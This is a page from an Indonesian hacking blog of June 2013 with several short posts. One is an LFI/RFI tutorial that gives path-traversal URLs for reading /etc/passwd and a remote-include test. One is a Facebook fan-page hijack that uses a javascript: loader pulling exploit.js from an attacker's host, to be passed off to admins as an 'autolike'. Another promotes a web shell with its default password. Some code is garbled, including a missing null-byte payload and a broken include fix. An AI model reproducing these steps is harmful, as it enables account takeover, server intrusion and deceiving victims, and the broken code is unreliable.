Blogger news

Kamis, 20 Juni 2013

    LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

     RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:



Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
Misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


    Nah ,disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.

     Misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

Tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini


Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

     Nah ,untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

     Lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

    Nah ,kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

     Jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

     Maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

     Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

 Sumber: Hacker Newbie

 ---------------------------------------------------------------------------------------------------------------  Description: Tutor singkat RFI & LFI Rating: 3.5 Reviewer: Unknown ItemReviewed: Tutor singkat RFI & LFI
Posted by: Lucifear Lucifear Inc . Updated at : 20.24

Posted on 20.24 by Unknown

No comments

Selasa, 18 Juni 2013

Apa Itu Web Shell ?

    Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak dulu, tapi baru sekarang saya mempelajarinya, dan baru sempat posting saat ini.

    Web Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

    Untuk setiap web shell akan berbeda-beda, sesuai dengan Web Server yang dipakai. Misal jika server menggunakan Apache (biasanya PHP), maka webShell dalam berntuk PHP Script, begitu pula dengan ASP, PERL, CGI, dll.

    Kali ini saya tidak akan menunjukan, bagaimana cara memasukan webShell tersebut ke server yang mau dihack. Saya disini hanya akan mencobanya pada server sendiri, dan untuk melihat, seberapa besarkah efek yang ditimbulkan C99 ini.

    Jika anda tertarik untuk bisa mengUpload webShell ini pada server korban, maka anda bisa menggunakan tehnik RFI ( Remote File Inclusion), yang tentunya anda tinggal mencari saja tutorialnya di Google.

     Download
 --------------------------------------------------------------------------------------------------------------- Description: Apa Itu Web Shell ? Rating: 3.5 Reviewer: Unknown ItemReviewed: Apa Itu Web Shell ?
Posted by: Lucifear Lucifear Inc . Updated at : 09.34

Posted on 09.34 by Unknown

No comments

Senin, 17 Juni 2013

Man In The Middle Attack
  
    ARP chance adalah sebuah file yang digunakan utnuk menyimpan alamat – alamat ip dan mac address dari komputer – komputer yang pernah berhubunga dengannya.Jika suatu saat terjadi perbedaan ip antara ARP chance dengan (contoh) DNS server maka yang digunakan adalah alamat ip yang ada pada ARP chance tersebut (salah satu kesalahan karena terlalu percaya diri ).
    
    Man-In-The-Middle Attack adalah sebuah aksi sniffing yang memanfaatkan kelemahan switch dan kesalahan penangannan ARP chache dan TCP/IP oleh OS 2003 dan XP. Ide awalnya adalah menempatkan komputer hacker ditengah dua komputer yang sedang berhubungan sehingga paket data harus melalui komputer hacker dulu agar paket data itu bisa dilihat atau diintip oleh hacker.

    Switch hanya akan menyimpan masing-masing alamat MAC dan port keberapa dia terkoneksi dan tidak akan menyimpan IP adrress karena swicth memang tidak bisa melakukannya.

     Apabila komputer Korban sudah pernah berhubungan dengan komputer Tujuan maka di komputer Korban maupun di komputer Tujuan akan tersimpan ARP chache yang menyimpan IP adress dan MAC adrress komputer yang pernah berhubungan dengannya.Untuk OS XP ARP chache bisa bertahan selama 5 menit.

     Cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah MITM.

--------------------------------------------------------------------------------------------------------------- Description: Man In The Middle Attack Rating: 3.5 Reviewer: Unknown ItemReviewed: Man In The Middle Attack
Posted by: Lucifear Lucifear Inc . Updated at : 22.50

Posted on 22.50 by Unknown

No comments

Hack FansPage Facebook
   
    Hack FansPage Facebook yang ini menggunakan kecerobohan admin ,dengan menggunakan metode Javascript Hack.

    Saya tidak menjamin Exploit ini masih bekerja ,karena sistim keamanan Facebook yang terus diperketat setiap harinya . xD

    Persiapkan :
1. Fanspage Exploit Download  Password: Lihat
2. Hostingan Gratis
3. Script Untuk Menjalankan Exploit
4. Email Id Facebookmu
 
    Pertama ,edit exploit.js dengan notepad. Cari bagian mail Id, lalu ganti dengan email Id kamu. Save !.Kemudian ,buat hostingan di hosting gratis ,lalu upload exploit.js.

    Pastikan upload di directory root / public_html.. http://yoursite.hostingan.com/exploit.js.Berikut script untuk menjalankan Exploit.js yg sudah diupload di hostingan.

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

    Sekarang ,kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya .Dengan mengkopy kode script lalu dipastekan di adressbar browser. 

   "Katakan saja ini Autolike Fanspage Atau Terserah Kamu."

---------------------------------------------------------------------------------------------------------------Description: Hack FansPage Facebook Rating: 3.5 Reviewer: Unknown ItemReviewed: Hack FansPage Facebook
Posted by: Lucifear Lucifear Inc . Updated at : 11.04

Posted on 11.04 by Unknown

No comments

1n73ction Webshell v3.2
   
    1n73ction Shell merupakan private shell dari X'1n73ct .Shell ini hasil dari decode dari shell asli b374k yang ditambahkan banyak fitur oleh X'1n73ct .

    Keistimewaan dari 1n73ction Shell ini yaitu penambahan fitur2 yang sangat banyak ,diantaranya yaitu Wordpress Bruteforce ,Joomla Bruteforce ,Admin Finder ,Symlink ,SQLi Scanner ,Config ,Bypass ,Cpanel Bruteforce ,dan masih banyak lagi.

    Dan anehnya , 1n73ction Shell yang satu ini ukuranya kecil banget . Hanya 2kb ,gue juga heran sama 1n73ction Shell ini .

    Password defaultnya adalah 1n73ction . Namun kalian bisa mengubahnya sendiri dengan bentuk md5 .Bagi yang belum punya ,silakan klik link di bawah .

Klik -> http://goo.gl/wTfhR

----------------------------------------------------------------------------------------------------------------Description: 1n73ction Webshell v3.2 Rating: 3.5 Reviewer: Unknown ItemReviewed: 1n73ction Webshell v3.2
Posted by: Lucifear Lucifear Inc . Updated at : 06.54

Posted on 06.54 by Unknown

No comments

Android Network Toolkit
   
    Android Network Toolkit atau bisa disingkat dengan nama ANTI, memeberi kebebasan lebih kepada pentester untuk menganalisis sebuah jaringan yang terhubung dengan gadget android anda.

Beberapa kegunaan yang dapat dilakukan oleh aplikasi yang satu ini adalah :
1. Sniffing
2. Denial Of Service Attack.
3. Man In The Middle Attack
4. Network Mapping
5. Pawned Target

    Bisa dilihat dari fungsi fungsi yang ada kita dapat langsung melakukan sebuah penetrasi di dalam jaringan dengan menggunakan exploit yang telah tersedia di dalamnya.

    Android Network Toolkit Juga sempat masuk dalam pembahasan Defcon #19 ,dimana para penggelut dunia IT dari seluruh dunia berkumpul dalam confrence ini. Disana dijelaskan bahwa aplikasi ini dibuat dengan tujuan memasukan advance hacking ke dalam sebuah gadget.

    Yang dapat di lakukan dengan sangat mudah bahkan lebih mudah dari menyusun 10 potong puzzle.
Android Network toolkit bisa kita dapatkan dengan gratis, tapi disaat melakukan sebuah penetrasi akan membutuhkan beberapa kredit yang dapat di beli pada situs resminya.

     Tapi tenang saja, setelah anda menginstal aplikasi tersebut anda akan mendapatkan beberapa kredit secara cuma cuma.

    Anda dapat mendownload tool Android Network Toolkit di website berikut .
Klik -> Zantiapp.

---------------------------------------------------------------------------------------------------------------
Description: Android Network Toolkit Rating: 3.5 Reviewer: Unknown ItemReviewed: Android Network Toolkit
Posted by: Lucifear Lucifear Inc . Updated at : 06.01

Posted on 06.01 by Unknown

No comments

Definisi Dan Arti Dari Backdoor

        Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).Awalnya Backdoor dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

    Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).

    "Backdoor merupakan akses khusus yang dibuat oleh seorang programmer untuk dapat masuk ke dalam sistem. Tidak semua programmer mengerti setiap perintah yang terdapat di dalam sistem operasi. Di dalam sistem operasi seorang programmer memasukkan perintah-perintah tertentu. Dari perintah-perintah inilah seorang hacker dapat melewati perintah-perintah yang harus dilalui apabila seseorang memasuki suatu sistem operasi tapi kode-kode yang disisipkan tersebut tidak mempengaruhi kinerja sistem operasi."

( Hacker Dictionary, Dony Ariyus )

    Backdoor juga bisa dibilang jalan alternatif  untuk masuk ke sebuah sistem tanpa diketahui oleh operator sistem. Backdoor biasanya dibuat untuk jaga-jaga kalau saja pintu masuk utama ke dalam sistem error. Backdoor juga bisa dibuat diluar sistem, biasanya para peretas yang membuatnya, supaya dapat mengakses data sistem tanpa memasuki pintu utama sistem.


---------------------------------------------------------------------------------------------------------------
Description: Definisi Dan Arti Dari Backdoor Rating: 3.5 Reviewer: Unknown ItemReviewed: Definisi Dan Arti Dari Backdoor
Posted by: Lucifear Lucifear Inc . Updated at : 03.11

Posted on 03.11 by Unknown

No comments

Minggu, 16 Juni 2013


    Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system oleh user yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalah metasploit.

     Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hacker bekerja, yaitu:
1. Information Gathering
2. Vulnerability Assessment
3. Gaining Access
4. Maintaining Access
5. Wiping Trace

    Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap.

     Untuk cara pemakaiannya dapat kita cari atau terjun langsung ke dalam dunia Backtrack agar maksimal, kenapa Harus di Backtrack? karena di Backtrack ini adalah satu-satunya OS yang memiliki Fitur Hacking yang sangat Lengkap. Atau dapat kita peroleh atau belajar langsung di Sini.

    Atau Forum lainya yang menyediakan Pembelajaran tersebut.

--------------------------------------------------------------------------------------------------------------- Description: Pengertian Exploitasi Dalam Metasploit Rating: 3.5 Reviewer: Unknown ItemReviewed: Pengertian Exploitasi Dalam Metasploit
Posted by: Lucifear Lucifear Inc . Updated at : 10.16

Posted on 10.16 by Unknown

No comments